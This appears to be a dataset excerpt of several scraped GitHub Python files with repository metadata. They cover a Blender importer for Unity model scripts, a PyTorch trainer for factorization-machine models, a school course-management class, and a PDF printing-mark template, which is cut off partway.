submesh[2::3])):\n try:\n bm_face = bm.faces.new((bm_verts[i] for i in face))\n bm_face.smooth = True\n bm_face.material_index = submesh_index\n except ValueError as e:\n # duplicate face, save id for later\n print(\"Duplicate face: %d\" % face_index)\n dupfaces.add(face_index)\n \n # create uv layers\n uv_lay = bm.loops.layers.uv.verify()\n face_index_ofs = 0\n for face_index, face_uv in enumerate(self.model['uv']):\n # skip duplicate faces and correct face index\n if face_index in dupfaces:\n face_index_ofs = face_index_ofs - 1\n continue\n \n for loop_index, loop_uv in enumerate(face_uv):\n bm.faces[face_index + face_index_ofs].loops[loop_index][uv_lay].uv = loop_uv\n \n # export BMesh to mesh data\n bm.to_mesh(me)\n me.update()\n \n return me\n \n def build_armature(self, ob_mesh, ob_amt):\n bpy.ops.object.mode_set(mode='EDIT')\n \n # create vertex groups, and add verts and weights\n # first arg in assignment is a list, can assign several verts at once\n for name, vgroup in self.model['vg'].items():\n grp = ob_mesh.vertex_groups.new(name)\n for (v, w) in vgroup:\n grp.add([v], w, 'REPLACE')\n \n # first pass: create and position bones\n for bone_name, bone_data in self.model['bones'].items():\n scale = 1 / self.get_bone_scale(bone_name, 1)\n bone = ob_amt.data.edit_bones.new(bone_name)\n bone.head = bone_data['pos']\n bone.tail = bone.head + Vector((0, scale * -0.1, 0))\n bone.roll = 0\n\n # second pass: build bone hierarchy\n for bone_name, bone_data in self.model['bones'].items():\n bone = ob_amt.data.edit_bones.get(bone_name)\n bone_parent_name = bone_data.get('parent')\n if bone and bone_parent_name:\n bone_parent = ob_amt.data.edit_bones.get(bone_parent_name)\n if bone_parent:\n bone.parent = bone_parent\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n # create custom shape for bones\n bone_shape = bpy.data.objects.get(\"bone_shape\")\n if not bone_shape:\n bone_shape = bpy.ops.object.empty_add(type='SPHERE')\n bone_shape = bpy.context.active_object\n bone_shape.name = \"bone_shape\"\n bone_shape.use_fake_user = True\n #bone_shape.empty_draw_size = 0.2\n bpy.context.scene.objects.unlink(bone_shape) # don't want the user deleting this\n bpy.context.scene.objects.active = ob_amt\n \n bpy.ops.object.mode_set(mode='POSE')\n \n # apply custom shape\n for bone in ob_amt.pose.bones:\n bone.custom_shape = bone_shape\n \n # third pass: apply bone 
scales\n for bone_name, bone_data in self.model['bones'].items():\n bone = ob_amt.pose.bones.get(bone_name)\n bone.scale = bone_data['lscl']\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n def get_bone_scale(self, bone_name, scale):\n bone_data = self.model['bones'][bone_name]\n scale *= (bone_data['lscl'][0] + bone_data['lscl'][1] + bone_data['lscl'][2]) / 3\n \n bone_parent_name = bone_data.get('parent')\n if bone_parent_name:\n scale = self.get_bone_scale(bone_parent_name, scale)\n \n return scale\n \n\ndef menu_func_import(self, context):\n self.layout.operator(ImportPythonModel.bl_idname, text=\"Unity Python model script (.py)\")\n\ndef register():\n bpy.utils.register_class(ImportPythonModel)\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n\ndef unregister():\n bpy.utils.unregister_class(ImportPythonModel)\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n\nif __name__ == \"__main__\":\n register()\n\n # test call\n #bpy.ops.import_mesh.unity('INVOKE_DEFAULT')\n", "repo_name": "ata4/unity-editor-utils", "sub_path": "Blender/io_import_unity.py", "file_name": "io_import_unity.py", "file_ext": "py", "file_size_in_byte": 8408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bpy.types.Operator", "line_number": 22, "usage_type": "name"}, {"api_name": "bpy_extras.io_utils.ImportHelper", "line_number": 22, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 61, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 61, "usage_type": "attribute"}, {"api_name": "math.radians", "line_number": 62, "usage_type": "call"}, {"api_name": "bpy.data.objects.new", "line_number": 68, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 68, "usage_type": "attribute"}, {"api_name": "bpy.data.armatures.new", "line_number": 75, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 79, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 79, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 92, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 92, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 93, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 93, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 94, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bpy.data.meshes.new", "line_number": 102, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bmesh.new", "line_number": 103, "usage_type": "call"}, {"api_name": "bpy.data.materials.get", "line_number": 120, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 120, "usage_type": "attribute"}, {"api_name": "bpy.data.materials.new", "line_number": 122, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 155, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 155, "usage_type": "attribute"}, {"api_name": 
"mathutils.Vector", "line_number": 169, "usage_type": "call"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 181, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 181, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 184, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.empty_add", "line_number": 186, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 187, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.unlink", "line_number": 191, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 191, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 192, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 194, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 194, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.mode_set", "line_number": 205, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 205, "usage_type": "attribute"}, {"api_name": "bpy.utils.register_class", "line_number": 222, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 222, "usage_type": "attribute"}, {"api_name": "bpy.types.INFO_MT_file_import.append", "line_number": 223, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 226, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 226, "usage_type": "attribute"}, {"api_name": "bpy.types.INFO_MT_file_import.remove", "line_number": 227, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 227, "usage_type": "attribute"}]} +{"seq_id": "40392748064", "text": "from FM.data import CbDataNew\nfrom FM.layers import WideDeep, DeepFM, NFM, DeepCross, AFM, xDeepFM\nfrom FM.utils import roc_auc_compute\nfrom sklearn.metrics import roc_auc_score\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nimport numpy as np\nimport warnings\nimport time\nimport os\nfrom sklearn.metrics import roc_auc_score\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Main:\n\n def __init__(self, gbdt_model, pre_defined_idx, device, data_or_dataroot, emb_size, model_save_dir,\n model_name, concat_wide):\n assert model_name in ['WideDeep', 'DeepFM', 'NFM', 'DeepCross', 'AFM', 'xDeepFM']\n self.model_name = model_name\n self.emb_size = emb_size\n self.concat_wide = concat_wide\n self.pre_defined_idx = pre_defined_idx # 更训练gbdt 时的样本保持一致;相同的train,val,test;\n self.gbdt_model = gbdt_model\n if isinstance(data_or_dataroot, str):\n self.train_dataset = CbDataNew(root_dir=data_or_dataroot,\n add_CLS=False,\n gbdt_model=gbdt_model,\n data_idx=pre_defined_idx[0])\n\n self.val_dataset = CbDataNew(root_dir=data_or_dataroot,\n add_CLS=False,\n gbdt_model=gbdt_model,\n data_idx=pre_defined_idx[1])\n else:\n print('use given dataset')\n self.train_dataset, self.val_dataset = data_or_dataroot\n self.num_trees = self.val_dataset.num_trees\n self.leaf_num_per_tree = self.val_dataset.leaf_num_per_tree\n self.device = device\n self.model_save_dir = model_save_dir\n if model_name == 'WideDeep':\n self.model = WideDeep(num_uniq_leaf=self.leaf_num_per_tree * self.num_trees,\n num_trees=self.num_trees,\n dim_leaf_emb=emb_size).to(device)\n\n elif model_name == 'DeepFM':\n self.model = DeepFM(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n 
emb_size,\n concat_wide).to(device)\n\n elif model_name == 'NFM':\n self.model = NFM(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n emb_size,\n concat_wide).to(device)\n\n elif model_name == 'DeepCross':\n self.model = DeepCross(self.leaf_num_per_tree * self.num_trees,\n self.num_trees,\n emb_size,\n num_layers=4,\n concat_wide=concat_wide).to(device)\n\n elif model_name == 'AFM':\n self.model = AFM(self.leaf_num_per_tree * self.num_trees, emb_size).to(device)\n\n elif model_name == 'xDeepFM':\n self.model = xDeepFM(num_layers=4,\n layer_filters=4,\n num_uniq_leaf=self.leaf_num_per_tree * self.num_trees,\n num_trees=self.num_trees,\n dim_leaf_emb=emb_size,\n concat_wide=concat_wide).to(device)\n print(self.model)\n self.criterion = nn.BCELoss()\n\n def train(self, epoch, batch_size, lr, weight_decay, verbose, save_model, save_log, eval_full_epoch, early_stop):\n if early_stop:\n self.early_stop = True\n else:\n self.early_stop = False\n self.best_val_auc = -1\n self.early_stop_tolerate = 0\n self.stop_flag = False\n if verbose == 1:\n self.verbose = 1\n else:\n self.verbose = 0\n if save_log:\n dir_path = os.getcwd() + '/run_log_dir/'\n print(\"train log will be saved in directory:\" + \"run_log_dir\")\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file = open(dir_path + '{}_logs{}.txt'.format(self.model_name,\n time.strftime(\"%Y-%m-%d_%H:%M:%S\", time.localtime())), 'w')\n file.writelines(\n '------------------class init paras------------------\\nemb_size{}\\nmodel_name:{}\\nmodel_save_dir:{}\\nconcat_wide:{}\\n'.format(\n self.emb_size, self.model_name, self.model_save_dir,\n self.concat_wide))\n\n file.writelines(\n '\\n------------------train paras------------------\\nepoch:{}\\nbatch_size:{}\\nlr:{}\\nweight_decay:{}\\nverbose:{}\\nsave_model:{}\\neval_full_epoch:{}\\n'.format(\n epoch, batch_size,\n lr, weight_decay, verbose,\n save_model, eval_full_epoch))\n else:\n file = None\n self.train_loader = DataLoader(dataset=self.train_dataset, batch_size=batch_size)\n if eval_full_epoch:\n self.val_loader = DataLoader(dataset=self.val_dataset, batch_size=len(self.val_dataset))\n else:\n self.val_loader = DataLoader(dataset=self.val_dataset, batch_size=batch_size)\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr,\n betas=(0.9, 0.999), eps=1e-08, weight_decay=weight_decay)\n print('start training ......')\n for epoch_id in range(epoch):\n if self.stop_flag is True:\n break\n t0 = time.time()\n train_loss, val_loss, train_auc, val_auc = self._train_epoch(optimizer=optimizer, log_file=file)\n\n if verbose == 1:\n if save_log:\n file.writelines(\n '\\n----------------------- epoch_id:{}/{} use:{} seconds -------------------------\\n'.format(\n epoch_id, epoch, time.time() - t0))\n file.writelines(\n 'train_loss:{} valid:loss:{} \\n\\ntrain_auc:{} valid_auc:{}\\n'.format(train_loss, val_loss,\n train_auc, val_auc))\n\n print('\\n----------------------- epoch_id:{}/{} use:{} seconds --------------------------'.format(\n epoch_id, epoch, time.time() - t0))\n print(\n 'train_loss:{} valid:loss:{} \\n\\ntrain_auc:{} valid_auc:{}'.format(train_loss, val_loss, train_auc,\n val_auc))\n\n if save_model:\n if save_log:\n file.writelines('\\nmodel saved in {}'.format(\n self.model_save_dir + '{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc)))\n\n print('\\nmodel saved in {}'.format(\n self.model_save_dir + '{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc)))\n torch.save(self.model,\n self.model_save_dir + 
'{}_epoch_{}_auc_{}'.format(self.model_name, epoch_id, val_auc))\n if save_log:\n file.close()\n\n def _train_epoch(self, optimizer, log_file=None):\n train_targets_list, train_logit_list, train_loss_list, batch_idx = [], [], [], None\n for batch_idx, data in enumerate(self.train_loader):\n if self.stop_flag is True:\n break\n inputs = data['x'].to(self.device)\n target = data['y'].to(self.device)\n optimizer.zero_grad()\n score = self.model(inputs)\n loss = self.criterion(score, target.float())\n loss.backward()\n optimizer.step()\n # print('batch_idx:{} use:{} seconds'.format(batch_idx, time.time() - t0))\n train_targets_list.append(target)\n train_logit_list.append(score)\n train_loss_list.append(loss.tolist())\n if batch_idx % 10 == 0:\n self.train_loss = np.mean(train_loss_list)\n self.train_auc = roc_auc_compute(torch.cat(train_targets_list), torch.cat(train_logit_list).detach())\n self._eval_epoch(batch_idx=batch_idx, log_file=log_file)\n return self._eval_epoch(batch_idx=batch_idx, log_file=log_file)\n\n def _eval_epoch(self, batch_idx, log_file=None):\n self.model.eval()\n with torch.no_grad():\n val_target_list, val_logit_list, val_loss_list = [], [], []\n for idx, data in enumerate(self.val_loader):\n inputs = data['x'].to(self.device)\n target = data['y'].to(self.device)\n logits = self.model(inputs)\n val_loss = self.criterion(logits, target.float())\n val_target_list.append(target)\n val_logit_list.append(logits)\n val_loss_list.append(val_loss.tolist())\n if idx == 30:\n break\n val_loss = np.mean(val_loss_list)\n val_auc = roc_auc_compute(torch.cat(val_target_list), torch.cat(val_logit_list))\n if val_auc >= self.best_val_auc:\n self.best_val_auc = val_auc\n else:\n self.early_stop_tolerate += 1\n\n if (self.early_stop_tolerate == 5) and (self.early_stop is True):\n print('early_stop_tolerate = 5, with best val_auc:{}'.format(self.best_val_auc))\n if log_file:\n log_file.writelines('\\nearly_stop_tolerate = 5, with best val_auc:{}'.format(self.best_val_auc))\n self.stop_flag = True\n\n if self.verbose != 1:\n print('\\n--------------------------------batch_num:{}/{}----------------------------------------'.format(\n batch_idx, len(self.train_loader.dataset) // self.train_loader.batch_size))\n print('train_loss:{} valid:loss:{}\\ntrain_auc:{} valid_auc:{}'.format(self.train_loss, val_loss,\n self.train_auc, val_auc))\n if log_file is not None:\n log_file.writelines(\n '\\n------------------------------batch_num:{}/{}-------------------------------------\\n'.format(\n batch_idx, len(self.train_loader.dataset) // self.train_loader.batch_size))\n log_file.writelines('train_loss:{} valid:loss:{}\\ntrain_auc:{} valid_auc:{}'.format(self.train_loss,\n val_loss,\n self.train_auc,\n val_auc))\n return self.train_loss, val_loss, self.train_auc, val_auc\n\n def predict(self, new_x, load_path=None):\n if load_path:\n model = torch.load(load_path)\n else:\n model = self.model\n model.eval()\n logits = model(new_x)\n return logits\n\n def eval_(self, x, y, load_path=None):\n x = torch.tensor(x)\n output = self.predict(x, load_path)\n return roc_auc_score(y, output.detach().numpy().flatten())\n", "repo_name": "brakeman/general_pro", "sub_path": "FM/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11448, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 13, "usage_type": "call"}, {"api_name": "FM.data.CbDataNew", "line_number": 27, "usage_type": 
"call"}, {"api_name": "FM.data.CbDataNew", "line_number": 32, "usage_type": "call"}, {"api_name": "FM.layers.WideDeep", "line_number": 44, "usage_type": "call"}, {"api_name": "FM.layers.DeepFM", "line_number": 49, "usage_type": "call"}, {"api_name": "FM.layers.NFM", "line_number": 55, "usage_type": "call"}, {"api_name": "FM.layers.DeepCross", "line_number": 61, "usage_type": "call"}, {"api_name": "FM.layers.AFM", "line_number": 68, "usage_type": "call"}, {"api_name": "FM.layers.xDeepFM", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 96, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 116, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 122, "usage_type": "call"}, {"api_name": "time.time", "line_number": 129, "usage_type": "call"}, {"api_name": "time.time", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 169, "usage_type": "call"}, {"api_name": "FM.utils.roc_auc_compute", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 188, "usage_type": "call"}, {"api_name": "FM.utils.roc_auc_compute", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 226, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "26418163204", "text": "from conf import settings\nfrom lib.mypickle import MyPickle\nfrom core.Classes import Classes\n\n\nclass Course(object):\n\n def __init__(self, role, name, cycle, price, city):\n self.role = role\n self.name = name\n self.cycle = cycle # 周期\n self.price = price # 价格\n self.city = city # 城市\n\n @staticmethod\n def course_all(): # 查看所有课程详细信息,返回生成器\n return MyPickle(settings.file_name['course']).load()\n\n @staticmethod\n def get_course(course, role): # 查看角色对应的课程详细信息\n if not course or not role:\n return '课程和角色不能为空!'\n course_list = []\n for i in Course.course_all(): # 遍历所有课程\n if role == 'Manager': # 管理员查看所有\n course_list.append(i)\n elif role == 'Student': # 学生只能查看自己\n if course == i['name']:\n course_list.append(i)\n # return course_list\n elif role == 'Teacher': # 老师只能查看自己\n if course == i['name']:\n course_list.append(i)\n # return course_list\n else:\n return '角色未定义!'\n\n return course_list\n\n @staticmethod\n def course_exist(course): # 判断课程是否存在\n '''\n 
:param course: 课程\n :return: True 可用(课程不存在) False 不可用(课程已存在)\n '''\n if course == '':\n print('课程不能为空!')\n return False\n for i in Course.course_all(): # 遍历所有课程\n # 判断用户名是否匹配\n if course == i['name']:\n # 当找到匹配时,return False\n return False\n return True\n\n @staticmethod\n def course_classes(course): # 查看课程对应的班级\n if not course:\n print('课程不能为空!')\n return False\n\n course_list = []\n for i in Classes.classes_all(): # 遍历所有班级\n if course == i['course']:\n course_list.append(i['name'])\n return course_list\n\n @staticmethod\n def course_teacher(course): # 查看课程对应的老师\n if not course:\n print('课程不能为空!')\n return False\n\n teacher_all = MyPickle(settings.file_name['teacher']).load() # 遍历所有老师\n teacher = []\n for i in teacher_all:\n if course == i['course']:\n teacher.append(i['name'])\n return teacher\n\n @staticmethod\n def course_info(): # 查看课程名列表,比如['linux', 'python', 'go']\n course_list = []\n for i in Course.course_all():\n course_list.append(i['name'])\n return course_list\n\n\nif __name__ == '__main__':\n pass\n", "repo_name": "py3study/school_management", "sub_path": "core/Course.py", "file_name": "Course.py", "file_ext": "py", "file_size_in_byte": 2906, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lib.mypickle.MyPickle", "line_number": 17, "usage_type": "call"}, {"api_name": "conf.settings.file_name", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "core.Classes.Classes.classes_all", "line_number": 63, "usage_type": "call"}, {"api_name": "core.Classes.Classes", "line_number": 63, "usage_type": "name"}, {"api_name": "lib.mypickle.MyPickle", "line_number": 74, "usage_type": "call"}, {"api_name": "conf.settings.file_name", "line_number": 74, "usage_type": "attribute"}, {"api_name": "conf.settings", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "13092059161", "text": "from __future__ import annotations\n\n# Python standard\n\nfrom copy import copy\nimport io\nfrom math import floor\n\n# Type hint\nfrom typing import Union, Callable, List, Tuple, Dict, Literal\nfrom types import FunctionType\nfrom io import BytesIO, FileIO\n\n# PDF\nimport PyPDF2 as pypdf\nfrom reportlab.pdfgen.canvas import Canvas\n\n# Project modules\nfrom booklet.core.manuscript import Template, Manuscript\nimport booklet.utils.validation as vailidation\nfrom booklet.utils.conversion import mm\nfrom booklet.utils.color import Basis_Colors\nfrom booklet.utils.misc import *\n\n\nclass PrintingMark(Template):\n \"\"\"\n Add printing markers to each page.\n \"\"\"\n\n __name__ = \"printing mark\"\n __desciprtion__ = \"Add printing marks to manuscript\"\n\n @property\n def name(self):\n return PrintingMark.__name__\n\n @property\n def description(self):\n return PrintingMark.__desciprtion__\n\n def __init__(\n self,\n on: bool = False,\n margin: int = 43, # pts\n crop: bool = True,\n reg: bool = True,\n cmyk: bool = True,\n fold: bool = True,\n direction: bool = True\n ):\n\n self.on = on if type(on) == bool else False\n self.margin = margin if margin != None else 43\n self.crop = bool(crop)\n self.reg = bool(reg)\n self.cmyk = bool(cmyk)\n\n super().__init__(direction=True)\n\n def ____basic_position(\n self, pagesize: Tuple[float, float]\n ) -> Tuple[\n Tuple[float, float, float, float], Tuple[Tuple[float, float, float, float]]\n ]:\n x1 = self.margin * 0.25\n x2 = self.margin + pagesize[0] + x1\n y1 = self.margin + pagesize[1]\n y2 = 
self.margin\n\n x3 = y2\n x4 = x2 - x1\n y3 = x1\n y4 = y1 + y3\n\n return [[x1, x2, x3, x4], [y1, y2, y3, y4]]\n\n def __get_paper_dim(self, pagesize: Tuple[float, float]) -> Tuple[float, float]:\n width, height = pagesize\n x = 2 * self.margin + width\n y = 2 * self.margin + height\n return x, y\n\n def __draw_crop_lines(self, canvas: Canvas, positions: list = []) -> bool:\n if self.crop:\n if len(positions) == 0:\n positions = self.___get_crop_line_positions(self.manu_paper_format)\n canvas.setLineWidth(0.5 * mm)\n canvas.lines(positions)\n return True\n return False\n\n def __draw_registration(\n self, canvas: Canvas, ratio: float = 0.8, positions: list = []\n ) -> bool:\n self.reg_l = 0\n pagesize = self.manu_paper_format\n if self.reg:\n self.reg_l = l = ratio * self.margin\n center = self.margin / 2\n if len(positions) == 0:\n positions = self.___get_registeration_positions(l, center, pagesize)\n for position in positions:\n self.___draw_registration_mark(\n canvas=canvas, x=position[0], y=position[1], l=l\n )\n return True\n return False\n\n def __draw_color_marker(self, canvas: Canvas) -> bool:\n if self.cmyk:\n cyan = [(0.2 * (1 + i), 0, 0, 0) for i in range(0, 5)]\n magenta = [(0, 0.2 * (1 + i), 0, 0) for i in range(0, 5)]\n yellow = [(0, 0, 0.2 * (1 + i), 0) for i in range(0, 5)]\n black = [(0, 0, 0, 0.2 * (1 + i)) for i in range(0, 5)]\n\n color_sequence = [\n (1, 0, 0, 0),\n (1, 1, 0, 0),\n (0, 1, 0, 0),\n (0, 1, 1, 0),\n (0, 0, 1, 0),\n (1, 0, 1, 0),\n (1, 0, 0, 0),\n ]\n\n color_row1 = cyan + magenta\n color_row2 = yellow + black\n pagesize = self.manu_paper_format\n (\n vertical,\n case,\n origin,\n origin_s,\n length,\n ) = self.___get_color_marker_position_and_length(\n pagesize, padding_ratio=0.15\n )\n\n row, column = case.split(\"x\")\n\n row = int(row)\n column = int(column)\n color_map = (\n [color_row1, color_row2] if row == 2 else [color_row1 + color_row2]\n )\n\n if not vertical:\n column, row = row, column\n color_map = List12dim.transpose(color_map)\n\n for i in range(0, row):\n for j in range(0, column):\n square_coordinate = (origin[0] + length * i, origin[1] + length * j)\n color = color_map[i][j]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n origin_s\n for k in range(0, len(color_sequence)):\n i, j = (0 if vertical else k, k if vertical else 0)\n square_coordinate = (origin_s[0] + i * length, origin_s[1] + j * length)\n color = color_sequence[k]\n c, m, y, k = color\n canvas.saveState()\n canvas.setLineWidth(0)\n canvas.setFillColorCMYK(c, m, y, k)\n canvas.setStrokeColorCMYK(0, 0, 0, 0)\n canvas.rect(\n square_coordinate[0],\n square_coordinate[1],\n length,\n length,\n stroke=1,\n fill=1,\n )\n canvas.restoreState()\n\n return True\n return False\n\n def ___get_crop_line_positions(\n self, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n Tuple[float, float, float, float],\n ]:\n trim_l = self.margin * 0.5\n x, y = self.____basic_position(pagesize)\n return [\n (x[0], y[0], x[0] + trim_l, y[0]), # h, u l\n (x[0], y[1], x[0] + trim_l, y[1]), # h, d l\n (x[1], y[0], x[1] + trim_l, y[0]), # h, u r\n (x[1], y[1], x[1] + trim_l, y[1]), # h, d r\n (x[2], y[3], x[2], y[3] + trim_l), # v, u l\n (x[2], y[2], x[2], y[2] + trim_l), 
# v, d l\n (x[3], y[3], x[3], y[3] + trim_l), # v, u r\n (x[3], y[2], x[3], y[2] + trim_l), # v, d r\n ]\n\n def ___get_registeration_positions(\n self, l: float, center: float, pagesize: Tuple[float, float]\n ) -> list[\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n Tuple[float, float],\n ]:\n x, y = self.____basic_position(pagesize)\n trim_l = self.margin / 2\n return [\n (center - l / 2, y[0] - center - l),\n (center - l / 2, y[1] + center),\n (x[1] + trim_l / 2 - l / 2, y[0] - center - l),\n (x[1] + trim_l / 2 - l / 2, y[1] + center),\n (x[2] + center, y[3] + trim_l / 2 - l / 2),\n (x[2] + center, center - l / 2),\n (x[3] - center - l, y[3] + trim_l / 2 - l / 2),\n (x[3] - center - l, center - l / 2),\n ]\n\n def ___get_color_marker_position_and_length(\n self, pagesize: Tuple[float, float], padding_ratio: float\n ) -> Tuple[list, Literal[\"2x10\", \"1x20\"], list, list, float]:\n\n # Calculate side and head size and choose bigger one.\n pa = padding_ratio * self.margin\n hor = pagesize[0] - 2 * self.reg_l - self.margin\n ver = pagesize[1] - 2 * self.reg_l - self.margin\n\n if 2 * pa > hor or 2 * pa > ver:\n pa_t = padding_ratio * min(hor, ver)\n else:\n pa_t = pa\n vertical = True\n\n if ver < hor:\n vertical = False\n space_size = (hor - 2 * pa_t, self.margin - 2 * pa)\n origin = [self.margin * 1.5 + self.reg_l + pa_t, 0]\n\n else:\n space_size = (self.margin - 2 * pa, ver - 2 * pa_t)\n origin = [0, self.margin * 1.5 + self.reg_l + pa_t]\n\n # Fit 2x10, 1x20 to the empty space and calculate square size(min(width, height) respectively)\n # and choose bigger size\n # 2x10 case\n if vertical:\n dim2 = space_size[0] * 0.5\n dim10 = space_size[1] * 0.1\n else:\n dim2 = space_size[1] * 0.5\n dim10 = space_size[0] * 0.1\n dim2_10 = min(dim2, dim10)\n # 1x32 case\n if vertical:\n dim1 = space_size[0]\n dim20 = space_size[1] * 0.05\n else:\n dim1 = space_size[1]\n dim20 = space_size[0] * 0.05\n dim1_20 = min(dim1, dim20)\n\n square_length = max(dim2_10, dim1_20)\n case = \"2x10\" if dim2_10 > dim1_20 else \"1x20\"\n\n padding = self.margin / 2 - (\n square_length if case == \"2x10\" else square_length / 2\n )\n if ver < hor:\n origin[1] = padding\n else:\n origin[0] = padding\n\n # origin_mixed = (self.margin+hor+2*self.reg_l+pa, self.margin+pa) if vertical else (self.margin +pa, self.margin+ ver + 2*self.margin+ pa)\n origin_mixed = copy(origin)\n if ver < hor:\n origin_mixed[1] = self.margin * 1.5 + pagesize[1] - square_length * 0.5\n else:\n origin_mixed[0] = self.margin * 1.5 + pagesize[0] - square_length * 0.5\n\n return vertical, case, origin, origin_mixed, square_length\n\n def ___draw_registration_mark(\n self, canvas: Canvas, x: float, y: float, l: float\n ) -> NoReturn:\n def get_abpath4(x0, y0, x1, y1):\n return (x + x0, y + y0, x + x1, y + y1)\n\n def get_abpath2(x0, y0):\n return x + x0, y + y0\n\n line_t = l / 15 # /25\n line_l = l * (3 / 16)\n circle_r1 = l * (5 / 16) - line_t\n circle_r2 = circle_r1 - line_t * (1.5)\n\n lines = [\n get_abpath4(0, l / 2, line_l, l / 2),\n get_abpath4(l - line_l, l / 2, l, l / 2),\n get_abpath4(l / 2, 0, l / 2, line_l),\n get_abpath4(l / 2, l - line_l, l / 2, l),\n ]\n canvas.setLineWidth(line_t)\n canvas.setStrokeColor(Basis_Colors[\"reg\"])\n canvas.setFillColor(Basis_Colors[\"reg\"])\n # Draw cross line\n canvas.lines(lines)\n # Outer circle 